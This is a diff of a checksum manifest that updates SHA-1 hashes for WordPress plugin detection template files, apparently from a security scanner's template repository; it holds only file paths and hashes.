+http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:2292a9791ea8ddd78dad38753e4fbed1e1ab4452 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:db30cc1831297491ecfe0a6495859713a8dd73f2 -http/technologies/wordpress/plugins/header-footer.yaml:30cc98a13236032dccf14ae2fe99fe9d56f5e266 -http/technologies/wordpress/plugins/health-check.yaml:434ebac02b38d272862e843d279ade097373b116 -http/technologies/wordpress/plugins/hello-dolly.yaml:3b4b29b74ab3a565bee2e0023f89c6be63ea8193 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:3354d989b1b54c87cb6cac5b6f9a7f4bdded0da8 -http/technologies/wordpress/plugins/hostinger.yaml:2a95180c1efd6b15d71f0b2ca683fb36a75afbfc -http/technologies/wordpress/plugins/image-optimization.yaml:72ee4ac163c015ff70c59440d45ca3f4bc7abd6b -http/technologies/wordpress/plugins/imagify.yaml:c19f36223456d930c2940715f493c68faa699df2 -http/technologies/wordpress/plugins/imsanity.yaml:2b1a069beaa1e036742be2329b2533044948ba30 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:5b78c874bc8e513c5e062ce3679f6346e969814d -http/technologies/wordpress/plugins/instagram-feed.yaml:2ae64404253f58a85c83c73c4d812c374ae30a73 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:2ed60428095c8a55e130753280d5e9f71df35ac7 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:aa50d5d2cf10f2040c9992a2c9e0d54468c7773d +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:069ab1663d472ab9ad8bdb2bf52fba3550dc4e8e -http/technologies/wordpress/plugins/jetpack.yaml:e1101fa99394212f562b374328b038645b03a154 -http/technologies/wordpress/plugins/kadence-blocks.yaml:5938b6f082e8a762c473b0d827c9ef0fe8a319a9 -http/technologies/wordpress/plugins/kirki.yaml:550e62da80eaf424b333b4c23f95c9ca7898a355 -http/technologies/wordpress/plugins/leadin.yaml:3001a916dd806c9cb07802a06c95e50fbb7aab2b -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:7b1fb09276754ba8d686b704eef584c8b4e20e10 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:ddd75bc52ffdabe776c75e1d9bd93925169ae65b -http/technologies/wordpress/plugins/litespeed-cache.yaml:30a73374ed268826fbee1c3859581fd853ae4f7e -http/technologies/wordpress/plugins/loco-translate.yaml:f0b8efaed83163250447a47ad630f860f5dad491 -http/technologies/wordpress/plugins/loginizer.yaml:fbeb31a5764ee6ac44c38bdccec72b662870213a +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:399fcc30d28249a456528c6dfa36476039440b2e -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:46b871016cf8c5ad9f5f8dd833aadbcb7ca8100d -http/technologies/wordpress/plugins/mailpoet.yaml:be7b41e65360a9961f598a6daa5ba837e4729f28 -http/technologies/wordpress/plugins/maintenance.yaml:974abb7a98c6d3c32cde3c462f45921a8d7f2edf -http/technologies/wordpress/plugins/mainwp-child.yaml:6cd01a7fc929c0a4f3d739b23dba2e93716b3a05 -http/technologies/wordpress/plugins/malcare-security.yaml:2c3f0d45a1c0a657f49a1a8e8d227148f965d703 -http/technologies/wordpress/plugins/megamenu.yaml:bcf9b587464cedd970eb27037c273ebc17686a83 -http/technologies/wordpress/plugins/members.yaml:12eb42e1dca63312db380abe2f48026d7bf572b1 -http/technologies/wordpress/plugins/meta-box.yaml:05f5f6836483af8f1c420ea5a5d8727bbdff53a5 -http/technologies/wordpress/plugins/metform.yaml:5b0fc5fcdf855411ec85cef3074b9e4f758fde88 -http/technologies/wordpress/plugins/ml-slider.yaml:d813bfce1eec882a57d333b19f568863c4f8cf93 -http/technologies/wordpress/plugins/newsletter.yaml:dd0672a72fd00cdb8519d913a999e3eb667971bd -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:93ee8ccb31d603571ae0f5bb3d5ea62fea249e27 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:50bdfbb8a5660adfee27d193246f16efdf5fb59f -http/technologies/wordpress/plugins/ninja-forms.yaml:b2d6101709be36b8bc1f68a08ffc03ce820e64da -http/technologies/wordpress/plugins/ocean-extra.yaml:7beb2cd2fcf3ad954cf2195b2af65b013379cf7f -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:3e21cded6694cf08b1f7ec4e931113d68e059ee7 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:b66b3777e388e0952ec66499d145c3d6ec27048e -http/technologies/wordpress/plugins/optinmonster.yaml:19c9c2c363d82e810f9236fecdd8939f798a823e -http/technologies/wordpress/plugins/otter-blocks.yaml:ace5248ca160e467910fa039718e58cb494ebee1 -http/technologies/wordpress/plugins/password-protected.yaml:34bd75dff172e20df050909a144c8205bf09487b -http/technologies/wordpress/plugins/pdf-embedder.yaml:1055af6e8fe8b40b01228085cf33f4b357e2e4cf +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:e9a54f7bae3b0aa53cc365d4059c76407b566d58 -http/technologies/wordpress/plugins/pixelyoursite.yaml:2bd76536c2fad12eb089cbf821a9bace47f7c9c2 -http/technologies/wordpress/plugins/polylang.yaml:247116589f3c0d4704534cc1136147ce61a8f2bc +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:783ad4da46742ab924f841a460c8cabd879f7240 -http/technologies/wordpress/plugins/post-smtp.yaml:610369004795280bbcfb9b2a0d9d1ce94d79fd31 -http/technologies/wordpress/plugins/post-types-order.yaml:5b619e0d4ff29b42578e1a9d6ffc9650aa8560b3 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c323c9d79f59659ef8f300b960bbc02ff7674aac -http/technologies/wordpress/plugins/pretty-link.yaml:d7a048160478551843fc2787e9d34162e0ef02fd -http/technologies/wordpress/plugins/really-simple-captcha.yaml:9094898f53e07d64200d33967eb529b5bf00d46f -http/technologies/wordpress/plugins/really-simple-ssl.yaml:3d3b3e367da6e9d30a3eb5ac0955e6817a00d206 -http/technologies/wordpress/plugins/redirection.yaml:24bac0bf3fbe611b453c9445d5517be03bfbb5d1 -http/technologies/wordpress/plugins/redux-framework.yaml:86c577c29228a57992cec80463ac1b5491c64c5c -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7d000459f6636248654140cb0af63bdef585f175 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:7886db894516c71f786c8427ba1c2a5b3e092bf3 -http/technologies/wordpress/plugins/safe-svg.yaml:f11746c93254c6baa671686a75e84491c89824d3 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ac3d7c0a24af783eba981c6e3ee8dcbc76d9e4db -http/technologies/wordpress/plugins/sg-cachepress.yaml:e4eee6eba3c34c57acb8d0d743d3a69e27c061ac -http/technologies/wordpress/plugins/sg-security.yaml:5a53692600d72dc512fd82ee896a5de7d968a2de -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:005a49766eb5ad3d064889894d8628375a839309 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a7269348d24aac273bfc50ef252c5014125c8d34 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e291a870f574cb413673f3f7b255e71d99dece79 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:cb120ee55443666b230261a7714edbd21ed4b09a -http/technologies/wordpress/plugins/siteorigin-panels.yaml:b691280d8e9a80e39cc3948d169656d11256f8fd -http/technologies/wordpress/plugins/smart-slider-3.yaml:d4d3773d13785e2d2bcf56ccd2b5c04d3c895deb -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:8340ca7217c167b392d3fea2b784b3faa6cb5f16 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:ac54099dbb8f7b99b15f26c9d05430808aff524f -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:183d76d12a4f4d4fbef52ee85c9329753d7f5bc3 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:6d4645ee6a289f869eca2d607c050f857f1ce2ac -http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:625801ee278d5b31a9b2c75e8044775edc317724 -http/technologies/wordpress/plugins/tablepress.yaml:3467b8de0beb3f29c99126443a07a622d56471e4 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:4e58e391914137fda6d60a54cfb3252a33ec79ab -http/technologies/wordpress/plugins/templately.yaml:24bf838e34a3802c6561b67ee612818f8acdfeb2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:9c88c3e928dcbef231f223fce381c2eb960fe198 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:6f886393dc9a1a34fe232b094992071ff7f3c86b -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:8feafdabff9d640bf3d42f90669d048cc4fe6181 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:08d466cb68c6a8c55bb9cdc7dce305bef6a7973d -http/technologies/wordpress/plugins/under-construction-page.yaml:4b22b12c9f250674f32dd0a72e5783a35f1ccf50 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:efd09bec4255558660f0201bbb062ab0f5f3080a +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:584a20f6658b845eae296cd3c9caa70660117591 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:bca10686252215d05a5f32be91afafaed55cd66c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:4a75d72d5b1e9ae764b513d4cb5eacb8ec79ae9e -http/technologies/wordpress/plugins/webp-express.yaml:04484fc18da7a3097ff8eef04e93712b9d3d238d -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:2ba342d8b534d83af412d7c87ac0a510b02fbdb9 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:0240f77a175007bb38fca4fcf6ee72a39605932f -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c0804d5324b6d650908e8c2786da832c3e56c4c5 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:7d8cebc29c3f777de3029c20ec10182e122ec758 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:63ac5e2c0769e54ffcd03e7f942625aa580e432a -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:f84a5a559bb1067053efbb2526e5dbaf1604b9dd -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9fbd2d4d9f2c635b40a10310188b21846e425b60 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:944a2cceb12042fe7c1b6d0d770544bd17a12091 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:6296728bd1565b65b62d3ae20518e20058c012a9 -http/technologies/wordpress/plugins/woocommerce-services.yaml:2ea8bda51bfde200195c62161c1aacd25d40837b -http/technologies/wordpress/plugins/woocommerce.yaml:7242b42fa263e14e1f2fb2b28fc1881067975f19 -http/technologies/wordpress/plugins/wordfence.yaml:8cf2555ce8b9a37e92d84618300f567029aa2863 -http/technologies/wordpress/plugins/wordpress-importer.yaml:9f96a19e4a99e07b760838b6087ef1324f3e3dcc -http/technologies/wordpress/plugins/wordpress-seo.yaml:60f16bacb8ef84d6272e1578a4d41fef68089aa9 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:5f7959ab46ba33c65a6d15d8c6d7ed722e8f0c47 -http/technologies/wordpress/plugins/wp-crontrol.yaml:27d8b4c3b7ba741e801464073d5db80854f1c6af -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d5b6cf4bb0171dd1a4278561edaff4d1fd33ef65 -http/technologies/wordpress/plugins/wp-file-manager.yaml:964257f924c84636be6bfe2bdc97dc0d8af8ba00 -http/technologies/wordpress/plugins/wp-google-maps.yaml:17109418f8d19d7d398aaaec3bf63fbd599505a9 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:7615e30bb329bea408856deaacf38e5ed399ff07 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:71a3b39638051ce9ed2b3ded348afb672279de6a -http/technologies/wordpress/plugins/wp-migrate-db.yaml:52b3dd7e622dadd70087e37598adba88535a0f3a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:1c7ceb3fdece714b8a31ab49ebb8342517deb38c -http/technologies/wordpress/plugins/wp-optimize.yaml:24a3c8466e2d7921d5541882691a14cbdcda7512 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a239cbff17766b47120d61a42c8f21ea935b6c3 -http/technologies/wordpress/plugins/wp-reset.yaml:1ac5540102f632ec4c247f8c855c781cbb447e0a -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:0be20b24d1d7e0931881718fcfd542e9e2f45e42 -http/technologies/wordpress/plugins/wp-rollback.yaml:60622c0eda0ebf0228f68b0d8823b43679b3c0cf -http/technologies/wordpress/plugins/wp-seopress.yaml:7810a83b8cac808b1ca42ccd80aaad4f38e46b82 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:59fef35e70d9cc53b35b440c0548cd00f4d6df88 -http/technologies/wordpress/plugins/wp-smushit.yaml:fc86ba76c4b29045a1fae0cbbab7742f04b43e07 -http/technologies/wordpress/plugins/wp-statistics.yaml:da19f9f036479a1b0f1edbd6864e7be3e8cca528 -http/technologies/wordpress/plugins/wp-super-cache.yaml:eacbbb4b4c3392b17d8a82cadde144508b2f0642 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:e3b567d87072442e91a3dffeeaf8c618357d2fb9 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:8006fd6d5438ead5b7f7ba0cbf372271ffbf29ce -http/technologies/wordpress/plugins/wpforms-lite.yaml:7f0442d51ba37b874f77c06ba41aebe25d4d32ec -http/technologies/wordpress/plugins/wps-hide-login.yaml:552c9ab67ac6df624e78ce908dc5c019073d245a -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:d9f4f4f9af65d4f74dc4cc473b21b29fb68706d1 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 